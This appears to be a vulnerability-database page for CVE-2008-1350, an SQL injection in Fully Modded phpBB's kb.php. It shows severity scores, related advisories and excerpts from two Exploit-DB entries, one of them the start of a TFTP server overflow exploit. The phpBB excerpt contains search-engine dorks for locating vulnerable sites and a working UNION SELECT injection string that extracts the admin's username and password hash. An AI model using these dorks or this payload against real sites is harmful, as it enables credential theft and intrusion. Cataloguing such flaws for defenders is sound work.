CVE-2008-1350
published 2008-03-17CVE-2008-1350: SQL injection vulnerability in kb.php in Fully Modded phpBB (phpbbfm) 80220 allows remote attackers to execute arbitrary SQL commands via the k parameter in an…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.15%
62.9th percentile
SQL injection vulnerability in kb.php in Fully Modded phpBB (phpbbfm) 80220 allows remote attackers to execute arbitrary SQL commands via the k parameter in an article action.
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qwxm-cwww-43x8: SQL injection vulnerability in kb
ghsa_unreviewed·2022-05-01
CVE-2008-1350 [HIGH] CWE-89 GHSA-qwxm-cwww-43x8: SQL injection vulnerability in kb
SQL injection vulnerability in kb.php in Fully Modded phpBB (phpbbfm) 80220 allows remote attackers to execute arbitrary SQL commands via the k parameter in an article action.
Red Hat
namazu XSS flaw
vendor_redhat·CVSS 7.5
CVE-2008-1468 [HIGH] namazu XSS flaw
namazu XSS flaw
Cross-site scripting (XSS) vulnerability in namazu.cgi in Namazu before 2.0.18 allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded input, related to failure to set the charset, a different vector than CVE-2004-1318 and CVE-2001-1350. NOTE: some of these details are obtained from third party information.
No detection rules found.
Exploit-DB
TFTP Server for Windows 1.4 - ST Remote BSS Overflow
exploitdb·2008-05-08
CVE-2008-2161 TFTP Server for Windows 1.4 - ST Remote BSS Overflow
TFTP Server for Windows 1.4 - ST Remote BSS Overflow
---
#!/usr/bin/perl
# TFTPServer SP v1.4 for Windows remote .bss overflow exploit
# The Service or the RunStandAlone version.
# URL: http://sourceforge.net/projects/tftp-server/
#
# Author: tix or tixxDZ
# Date: 07/05/2008
#
# Tested on Windows XP SP2 French not patched
#
# TFTPServer SP v1.4 is vulnerable to a very long TFTP Error Packet
# Other versions may also be vulnerable.
#
# TFTPServer respect the RFC 1350 for Error packets, lot of other
# TFTP Servers don't respect it.
# TFTP Error Packet: "\x00\x05" . ErrorMsg . "\x00"
#
# BUFFER is at 0041B3AB in the .bss section.
# This exploit will overwrite all the .bss section and some portion of the .idata section
# to patch functions addresses in the IAT.
#
# For the TFTPServer Servic
Exploit-DB
Fully Modded phpBB - 'kb.php' SQL Injection
exploitdb·2008-03-12
CVE-2008-1350 Fully Modded phpBB - 'kb.php' SQL Injection
Fully Modded phpBB - 'kb.php' SQL Injection
---
# Powered by phpBB © 2001, 2006 phpBB Group
# Modified by Fully Modded phpBB © 2002, 2006
#
#########################################################################
#
# AUTHOR : TurkishWarriorr
#
# HOME : http://www.1923turk.org
#
#########################################################################
#
# DORKS 1 : allinurl :kb.php?mode=article&k
# DORKS 2 : article&k=
# DORKS 3 : "Powered by phpBB © 2001, 2006 phpBB Group" "Modified by Fully Modded phpBB © 2002, 2006"
#
##########################################################################
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1
#####
http://secunia.com/advisories/29339http://securityreason.com/securityalert/3745http://www.securityfocus.com/archive/1/489468/100/0/threadedhttp://www.securityfocus.com/bid/28225https://exchange.xforce.ibmcloud.com/vulnerabilities/41192https://www.exploit-db.com/exploits/5243http://secunia.com/advisories/29339http://securityreason.com/securityalert/3745http://www.securityfocus.com/archive/1/489468/100/0/threadedhttp://www.securityfocus.com/bid/28225https://exchange.xforce.ibmcloud.com/vulnerabilities/41192https://www.exploit-db.com/exploits/5243
2008-03-17
Published